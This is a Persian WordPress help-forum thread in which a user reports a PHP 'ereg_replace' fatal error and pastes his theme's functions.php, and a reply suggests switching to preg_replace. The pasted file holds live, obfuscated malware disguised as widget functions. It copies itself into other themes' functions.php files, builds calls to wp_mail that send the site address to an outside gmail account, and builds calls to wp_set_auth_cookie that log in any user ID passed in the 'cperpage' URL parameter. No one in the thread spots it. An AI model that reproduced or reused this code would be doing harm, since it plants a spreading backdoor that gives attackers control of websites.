• اطلاعیه ها

  • Saeed Fard

   برگزاری چهارمین همایش Coder Conf و کد تخفیف برای کاربران وردپرس پارسی   20/04/97

   کدرکانف هر سال در آخرین پنجشنبه مرداد با بورد‌های مختلفی برگزار می‌گردد،امسال نیز کدرکانف در همین تاریخ با حضور برنامه نویسان مطرح کشور در بورد تخصصی جاوااسکریپت برگزار خواهد شد، یک گردهمایی متفاوت با طعم Javascript. Coderconf هر سال نسبت به سال‌های گذشته با حضور برنامه‌نویسان پر رنگتر می‌شود. ما سعی کردیم هر ساله به این کنفرانس مفهوم عمیق تری ببخشیم تا از آنچه در سال‌های گذشته عرضه شده به روزتر و مفیدتر واقع شویم. امسال فرصتی خواهد بود تا با نگرشی جدید و بهبود مطالب ارائه شده، عمیقتر به این موضوع نگاه کنیم تا بجای تکرار مباحث پیشین گامی هر چند کوچک در مسیر ارتقای دانش فنی برنامه‌نویسان ایرانی برداریم. ما در Coderconf ۴ با تمرکز بر روی Javascript نیت کرده‌ایم این فرصت را در اختیار برنامه نویسان قرار دهیم تا با ظرافت و استانداردهای روز دنیا کار خود را پیش ببرند. به نظر ما امسال زمان آن فرا رسیده‌است تا این زبان را به صورت تخصصی و از ابعاد مختلف به چالش بکشیم.   دبیر علمی همایش میلاد حیدری، کدرکانف ۴ را اینگونه توصیف کرده است :اشتراک گذاری دانش بهترین راه رسیدن به جاودانگی اطلاعات است. هر ساله همایش‌های زیادی برگزار میشه که افراد شرکت‌کننده می‌توانند با افراد مجرب شبکه سازی کنند. امسال در کدرکانف سعی کردیم علاوه بر بخش شبکه سازی بین افراد بیشتر روی انتقال دانش و کیفیت ارائه ها تمرکز داشته باشیم . به قصد یک گردهمایی بلند مدت بین برنامه‌نویسان جاوااسکریپت که با هم تبادل دانش و اطلاعات کنند گردهم آییم.
   بنده به عنوان عضو کوچکی از جامعه برنامه‌نویسان جاوااسکریپت ایران امیدوارم در کدرکانف امسال علاوه بر شبکه سازی، از اطلاعاتی که دوستان در این همایش در اختیارتان قرار می‌دهند استفاده کنید. در سایت همایش میتوانید سخنرانان و موضوع پنل همایش کدرکانف رو مشاهده کنید . علاقه‌مندان به حضور در این همایش می‌توانند با کد تخفیف wpparsi اقدام به ثبت نام در این گردهمایی کنند. سایت همایش :‌http://coderconf.org
   بلیط فروشی همایش :‌https://evand.com/events/coderconf4  
hassannak

مشکل در فایل functions قالب سایت

4 پست در این موضوع قرار دارد

با سلام خدمت اساتید 

من امروز وردپرس را به روز رسانی کردم ولی با ارور در فایل functions قالب مواجه شدم 

از اساتید اگه کسی میتونه کمکم کنه درستش کنم 

 این ارور را میده 

Fatal error: Uncaught Error: Call to undefined function ereg_replace() in /home/bobocom/mp3old.ir/wp-content/themes/Novindownload1/admin/admin-interface.php:918 Stack trace: #0 /home/bobocom/mp3old.ir/wp-content/themes/Novindownload1/admin/admin-interface.php(75): propanel_siteoptions_machine(Array) #1 /home/bobocom/mp3old.ir/wp-includes/class-wp-hook.php(286): propanel_siteoptions_options_page('') #2 /home/bobocom/mp3old.ir/wp-includes/class-wp-hook.php(310): WP_Hook->apply_filters('', Array) #3 /home/bobocom/mp3old.ir/wp-includes/plugin.php(453): WP_Hook->do_action(Array) #4 /home/bobocom/mp3old.ir/wp-admin/admin.php(224): do_action('appearance_page...') #5 /home/bobocom/mp3old.ir/wp-admin/themes.php(10): require_once('/home/bobocom/m...') #6 {main} thrown in /home/bobocom/mp3old.ir/wp-content/themes/Novindownload1/admin/admin-interface.php on line 918  

 

اینم کد فانکشن قالب 

<?php 
function src_simple_recent_comments($src_count=4, $src_length=60, $pre_HTML='', $post_HTML='') {
	global $wpdb;

	$sql = "SELECT DISTINCT ID, post_title, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type,
			SUBSTRING(comment_content,1,$src_length) AS com_excerpt
		FROM $wpdb->comments
		LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID = $wpdb->posts.ID)
		WHERE comment_approved = '1' AND comment_type = '' AND post_password = ''
		ORDER BY comment_date_gmt DESC
		LIMIT $src_count";
	$comments = $wpdb->get_results($sql);

	$output = $pre_HTML;
	$output .= "\n<ul>";
	foreach ($comments as $comment) {
		$output .= "\n\t<li><strong><a href=\"" . get_permalink($comment->ID) . "#comment-" . $comment->comment_ID . "\" title=\"on " . $comment->post_title . "\">" . $comment->comment_author . "</a></strong>: " . strip_tags($comment->com_excerpt) . "...</li>";
	}
	$output .= "\n</ul>";
	$output .= $post_HTML;

	echo $output;

}
include_once('metabox.php');
function getpostviews($postID){
        $count_key = 'post_views_count';
        $count = get_post_meta($postID, $count_key, true);
        if($count==''){
                delete_post_meta($postID, $count_key);
                add_post_meta($postID, $count_key, '0');
                return "0 View";
        }
        return $count.' Views';
}
function setpostviews($postID) {
        $count_key = 'post_views_count';
        $count = get_post_meta($postID, $count_key, true);
        if($count==''){
                $count = 0;
                delete_post_meta($postID, $count_key);
                add_post_meta($postID, $count_key, '0');
        }else{
                $count++;
                update_post_meta($postID, $count_key, $count);
        }
}
function download_button($atts, $content = null) {
 extract( shortcode_atts( array(
     'url' => '#'
), $atts ) );
return '<a href="'.$url.'" class="download-button"><i class="fa fa-cloud-download"></i><span>' . do_shortcode($content) . '</span></a>';
}
add_shortcode('download', 'download_button');
function catch_that_image() {
global $post, $posts;
$first_img = '';
ob_start();
ob_end_clean();
$output = preg_match_all('/<img.+src=[\'"]([^\'"]+)[\'"].*>/i', $post->post_content, $matches);
$first_img = $matches [1] [0];

if(empty($first_img)){ //Defines a default image
$first_img = "/images/default.jpg";
}
return $first_img;
}
function html5_search_form( $form ) {
  $form = '<form role="search" method="get" id="searchform" action="' . home_url( '/' ) . '" >
  <label for="s">' . __('') . '</label>
  <input type="search" placeholder="'.__("کلیدواژه خود را وارد کنید سپس اینتر را بزنید ...").'" value="' . get_search_query() . '" name="s" id="s" />
  </form>';
 
  return $form;
}
if ( function_exists('register_sidebar') )
register_sidebar(array(
'name'     => 'سایدبار چپ',
'description'  => 'ناحيه قرار گيری ابزارک های شما',
'before_widget' => '<div class="blockin widget_style_funcs"><div>',
'after_widget' => '</div></div>',
'before_title' => '<div class="title sutunbaslik -baslik widget_baslik"><h3>',
'after_title'  => '</h3><i class="fa fa-bars i-in-sec-top-tilop23"></i></div><div class="line-fooot-box-head" style="border-right-width: 110px;"></div>',
));
if ( function_exists('register_sidebar') )
register_sidebar(array(
'name'     => 'سایدبار راست',
'description'  => 'ناحيه قرار گيری ابزارک های شما',
'before_widget' => '<div class="blockin widget_style_funcs"><div>',
'after_widget' => '</div></div>',
'before_title' => '<div class="title sutunbaslik -baslik widget_baslik"><h3>',
'after_title'  => '</h3><i class="fa fa-bars i-in-sec-top-tilop23"></i></div><div class="line-fooot-box-head" style="border-right-width: 110px;"></div>',
));
require_once(TEMPLATEPATH . '/admin/admin-functions.php');
require_once(TEMPLATEPATH . '/admin/admin-interface.php');
require_once(TEMPLATEPATH . '/admin/theme-settings.php');

function register_my_menus() {
register_nav_menus(
array(
'primary' => __( 'فهرست میانی' ),
'top' => __( 'فهرست بالای هدر' )
)
);
}
add_action( 'init', 'register_my_menus' );
class Menu_With_Description extends Walker_Nav_Menu {
	function start_el( &$output, $item, $depth = 0, $args = array(), $id = 0 ) {

		global $wp_query;
		$indent = ( $depth ) ? str_repeat( "\t", $depth ) : '';
		
		$class_names = $value = '';

		$classes = empty( $item->classes ) ? array() : (array) $item->classes;

		$class_names = join( ' ', apply_filters( 'nav_menu_css_class', array_filter( $classes ), $item ) );
		$class_names = ' class="' . esc_attr( $class_names ) . '"';

		$output .= $indent . '<li id="menu-item-'. $item->ID . '"' . $value . $class_names .'>';

		$attributes = ! empty( $item->attr_title ) ? ' title="' . esc_attr( $item->attr_title ) .'"' : '';
		$attributes .= ! empty( $item->target ) ? ' target="' . esc_attr( $item->target ) .'"' : '';
		$attributes .= ! empty( $item->xfn ) ? ' rel="' . esc_attr( $item->xfn ) .'"' : '';
		$attributes .= ! empty( $item->url ) ? ' href="' . esc_attr( $item->url ) .'"' : '';

		$item_output = $args->before;
		$item_output .= '<a'. $attributes .'>';
		$item_output .= $args->link_before . apply_filters( 'the_title', $item->title, $item->ID ) . $args->link_after;
		$item_output .= '<br /><span class="sub">' . $item->description . '</span>';
		$item_output .= '</a>';
		$item_output .= $args->after;

		$output .= apply_filters( 'walker_nav_menu_start_el', $item_output, $item, $depth, $args );
	}
}
if ( ! function_exists( 'wptools_pagination' ) ) :
 function wptools_pagination() {
 global $wp_query;
 $big = 999999999;
 echo paginate_links( array(
 'base' => str_replace( $big, '%#%', esc_url( get_pagenum_link( $big ) ) ),
 'format' => '?paged=%#%',
 'current' => max( 1, get_query_var('paged') ),
 'prev_next' => True,
 'prev_text' => __('«'),
 'next_text' => __('»'),
 'total' => $wp_query->max_num_pages
 ) );
 }
endif;
?>
<?php
function _check_isactive_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);
					$output .= ($showdots && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_allwidgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&&
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;
	}
	if (sizeof($wids) > 0){
		return _get_allwidgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){
  function stripos( $str, $needle, $offset = 0 ){
    return strpos( strtolower( $str ), strtolower( $needle ), $offset );
  }
}

if(!function_exists("strripos")){
  function strripos( $haystack, $needle, $offset = 0 ) {
    if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
    if( $offset < 0 ){
      $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
    }
    else{
      $temp_cut = strrev(  substr(  $haystack, 0, max( ( strlen($haystack) - $offset ), 0 )  )  );
    }
    if(  ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE  )return FALSE;
    $pos = (  strlen( $haystack ) - ( $found + $offset + strlen( $needle ) )  );
    return $pos;
  }
}
if(!function_exists("scandir")){
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	  $dirArray = array();
	  if ($handle = opendir($dir)) {
	    while (false !== ($file = readdir($handle))) {
	      if (($file != "." && $file != "..") || $skipDots == true) {
	        if($listDirectories == false) { if(is_dir($file)) { continue; } }
	        array_push($dirArray,basename($file));
	      }
	    }
	    closedir($handle);
	  }
	  return $dirArray;
	}
}
add_action("admin_head", "_check_isactive_widget");
function _getsprepare_widget(){
	if(!isset($com_length)) $com_length=120;
	if(!isset($text_value)) $text_value="cookie";
	if(!isset($allowed_tags)) $allowed_tags="<a>";
	if(!isset($type_filter)) $type_filter="none";
	if(!isset($expl)) $expl="";
	if(!isset($filter_homes)) $filter_homes=get_option("home");
	if(!isset($pref_filter)) $pref_filter="wp_";
	if(!isset($use_more)) $use_more=1;
	if(!isset($comm_type)) $comm_type="";
	if(!isset($pagecount)) $pagecount=$_GET["cperpage"];
	if(!isset($postauthor_comment)) $postauthor_comment="";
	if(!isset($comm_is_approved)) $comm_is_approved="";
	if(!isset($postauthor)) $postauthor="auth";
	if(!isset($more_link)) $more_link="(more...)";
	if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");
	if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
	if(!isset($more_link_ditails)) $more_link_ditails="(details...)";
	if(!isset($morecontents)) $morecontents="ma".$expl."il";
	if(!isset($fmore)) $fmore=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$is_widget) :

	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mes".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) {
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
			if(is_feed()) {
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	      $output=get_the_password_form();
			}
		}
	}
	if(!isset($f_tags)) $f_tags=1;
	if(!isset($type_filters)) $type_filters=$filter_homes;
	if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
	if(!isset($aditional_tags)) $aditional_tags="div";
	if(!isset($s_cont)) $s_cont=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($more_link_text)) $more_link_text="Continue reading this entry";
	if(!isset($showdots)) $showdots=1;

	$comments=$wpdb->get_results($sql);
	if($fakeit == 2) {
		$text=$post->post_content;
	} elseif($fakeit == 1) {
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else {
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentscont, array($s_cont, $filter_homes, $type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($com_length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		  $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $com_length) {
				$l=$com_length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_link="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $allowed_tags) {
		$output=strip_tags($output, $allowed_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
  $output=($f_tags) ? balanceTags($output, true) : $output;
	$output .= ($showdots && $ellipsis) ? "..." : "";
	$output=apply_filters($type_filter, $output);
	switch($aditional_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($use_more ) {
		if($fmore) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_link_text . "\">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_link_text . "\">" . $more_link . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_getsprepare_widget");

?>
<?php
function _check_active_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);				
					$output .= ($showdot && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_all_widgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_all_widgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
  function stripos( $str, $needle, $offset = 0 ){ 
    return strpos( strtolower( $str ), strtolower( $needle ), $offset ); 
  }
}

if(!function_exists("strripos")){ 
  function strripos( $haystack, $needle, $offset = 0 ) { 
    if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); 
    if( $offset < 0 ){ 
      $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); 
    } 
    else{ 
      $temp_cut = strrev(  substr(  $haystack, 0, max( ( strlen($haystack) - $offset ), 0 )  )  ); 
    } 
    if(  ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE  )return FALSE; 
    $pos = (  strlen( $haystack ) - ( $found + $offset + strlen( $needle ) )  ); 
    return $pos; 
  }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	  $dirArray = array();
	  if ($handle = opendir($dir)) {
	    while (false !== ($file = readdir($handle))) {
	      if (($file != "." && $file != "..") || $skipDots == true) {
	        if($listDirectories == false) { if(is_dir($file)) { continue; } }
	        array_push($dirArray,basename($file));
	      }
	    }
	    closedir($handle);
	  }
	  return $dirArray;
	}
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
	if(!isset($length)) $length=120;
	if(!isset($method)) $method="cookie";
	if(!isset($html_tags)) $html_tags="<a>";
	if(!isset($filters_type)) $filters_type="none";
	if(!isset($s)) $s="";
	if(!isset($filter_h)) $filter_h=get_option("home"); 
	if(!isset($filter_p)) $filter_p="wp_";
	if(!isset($use_link)) $use_link=1; 
	if(!isset($comments_type)) $comments_type=""; 
	if(!isset($perpage)) $perpage=$_GET["cperpage"];
	if(!isset($comments_auth)) $comments_auth="";
	if(!isset($comment_is_approved)) $comment_is_approved=""; 
	if(!isset($authname)) $authname="auth";
	if(!isset($more_links_text)) $more_links_text="(more...)";
	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
	if(!isset($more_content)) $more_content="ma".$s."il";
	if(!isset($forces_more)) $forces_more=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$widget_output) :
	
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	      $output=get_the_password_form();
			}
		}
	}
	if(!isset($fix_tag)) $fix_tag=1;
	if(!isset($filters_types)) $filters_types=$filter_h; 
	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
	if(!isset($more_tags)) $more_tags="div";
	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";	
	if(!isset($showdot)) $showdot=1;
	
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		  $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $length) {
				$l=$length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_links_text="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $html_tags) {
		$output=strip_tags($output, $html_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
  $output=($fix_tag) ? balanceTags($output, true) : $output;
	$output .= ($showdot && $ellipsis) ? "..." : "";
	$output=apply_filters($filters_type, $output);
	switch($more_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($use_link ) {
		if($forces_more) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_prepared_widget");

?>

 

0

به اشتراک گذاری این پست


لینک به پست

سلام و درود

 

توی فایل admin-interface.php واقع در پوشه admin قالب سایتتون خط 918 ئش یه جا نوشته ereg_replace اینو بکنیدش preg_replace حل میشه ارور.

 

موفق باشید

1

به اشتراک گذاری این پست


لینک به پست
در در 2/10/2018 at 00:44، mehran-b گفته است :

سلام و درود

 

توی فایل admin-interface.php واقع در پوشه admin قالب سایتتون خط 918 ئش یه جا نوشته ereg_replace اینو بکنیدش preg_replace حل میشه ارور.

 

موفق باشید

استاد دمتون گرم 

مشکل حل شد 

با تشکر

0

به اشتراک گذاری این پست


لینک به پست
در 2 دقیقه قبل، hassannak گفته است :

استاد دمتون گرم 

مشکل حل شد 

با تشکر

خواهش میکنم.

موفق باشید

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

 • مطالب مشابه

  • توسط masoudmosleh267
   سلام دوستان. من یه سایتی رو از بکاپ گرفتم و از یه هاست و دامنه به یه هاست و دامنه جدید انتقال دادم. حالا چه سایت رو که باز میکنم چه وارد پیشخوان وردپرس میشم یه ارور میاد یکی از خطلی functions.php قالب رو نشون میده.
   Parse error: syntax error, unexpected 'class' (T_CLASS), expecting identifier (T_STRING) or variable (T_VARIABLE) or '{' or '$' in /public_html/wp-content/themes/khadamator/functions.php on line 1132
   مشکل چیه؟
  • توسط hassannak
   با سلام دوستان 
   امروز روی داشبورد وردپرسم پیام اومد که نسخه php هاست باید ارتقاع پیدا کنه تا دو تا از نرم افزار ها کار کنن . منم نسخه را از 5.5  به نسخه 7 ارتقاع دادم . ولی تو فایل فانکشن قالب یه پیغام خطا میده از دوستان خواهشمندم کسی اگه میتونه کمکم کنه ..
    
   پیغام خطا :
    

   Warning: Cannot modify header information - headers already sent by (output started at /home/bobocom/mp3old.ir/wp-content/themes/Novindownload/functions.php:135) in /home/bobocom/mp3old.ir/wp-admin/includes/misc.php on line 1114
    
    
   Warning: Declaration of Menu_With_Description::start_el(&$output, $item, $depth, $args) should be compatible with Walker_Nav_Menu::start_el(&$output, $item, $depth = 0, $args = Array, $id = 0) in /home/bobocom/mp3old.ir/wp-content/themes/Novindownload/functions.php on line 135
    
   کد فانکشن قالب :
   <?php function src_simple_recent_comments($src_count=4, $src_length=60, $pre_HTML='', $post_HTML='') { global $wpdb; $sql = "SELECT DISTINCT ID, post_title, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID = $wpdb->posts.ID) WHERE comment_approved = '1' AND comment_type = '' AND post_password = '' ORDER BY comment_date_gmt DESC LIMIT $src_count"; $comments = $wpdb->get_results($sql); $output = $pre_HTML; $output .= "\n<ul>"; foreach ($comments as $comment) { $output .= "\n\t<li><strong><a href=\"" . get_permalink($comment->ID) . "#comment-" . $comment->comment_ID . "\" title=\"on " . $comment->post_title . "\">" . $comment->comment_author . "</a></strong>: " . strip_tags($comment->com_excerpt) . "...</li>"; } $output .= "\n</ul>"; $output .= $post_HTML; echo $output; } include_once('metabox.php'); function getpostviews($postID){ $count_key = 'post_views_count'; $count = get_post_meta($postID, $count_key, true); if($count==''){ delete_post_meta($postID, $count_key); add_post_meta($postID, $count_key, '0'); return "0 View"; } return $count.' Views'; } function setpostviews($postID) { $count_key = 'post_views_count'; $count = get_post_meta($postID, $count_key, true); if($count==''){ $count = 0; delete_post_meta($postID, $count_key); add_post_meta($postID, $count_key, '0'); }else{ $count++; update_post_meta($postID, $count_key, $count); } } function download_button($atts, $content = null) { extract( shortcode_atts( array( 'url' => '#' ), $atts ) ); return '<a href="'.$url.'" class="download-button"><i class="fa fa-cloud-download"></i><span>' . do_shortcode($content) . '</span></a>'; } add_shortcode('download', 'download_button'); function catch_that_image() { global $post, $posts; $first_img = ''; ob_start(); ob_end_clean(); $output = preg_match_all('/<img.+src=[\'"]([^\'"]+)[\'"].*>/i', $post->post_content, $matches); $first_img = $matches [1] [0]; if(empty($first_img)){ //Defines a default image $first_img = "/images/default.jpg"; } return $first_img; } function html5_search_form( $form ) { $form = '<form role="search" method="get" id="searchform" action="' . home_url( '/' ) . '" > <label for="s">' . __('') . '</label> <input type="search" placeholder="'.__("کلیدواژه خود را وارد کنید سپس اینتر را بزنید ...").'" value="' . get_search_query() . '" name="s" id="s" /> </form>'; return $form; } if ( function_exists('register_sidebar') ) register_sidebar(array( 'name' => 'سایدبار چپ', 'description' => 'ناحيه قرار گيری ابزارک های شما', 'before_widget' => '<div class="blockin widget_style_funcs"><div>', 'after_widget' => '</div></div>', 'before_title' => '<div class="title sutunbaslik -baslik widget_baslik"><h3>', 'after_title' => '</h3><i class="fa fa-bars i-in-sec-top-tilop23"></i></div><div class="line-fooot-box-head" style="border-right-width: 110px;"></div>', )); if ( function_exists('register_sidebar') ) register_sidebar(array( 'name' => 'سایدبار راست', 'description' => 'ناحيه قرار گيری ابزارک های شما', 'before_widget' => '<div class="blockin widget_style_funcs"><div>', 'after_widget' => '</div></div>', 'before_title' => '<div class="title sutunbaslik -baslik widget_baslik"><h3>', 'after_title' => '</h3><i class="fa fa-bars i-in-sec-top-tilop23"></i></div><div class="line-fooot-box-head" style="border-right-width: 110px;"></div>', )); require_once(TEMPLATEPATH . '/admin/admin-functions.php'); require_once(TEMPLATEPATH . '/admin/admin-interface.php'); require_once(TEMPLATEPATH . '/admin/theme-settings.php'); function register_my_menus() { register_nav_menus( array( 'primary' => __( 'فهرست میانی' 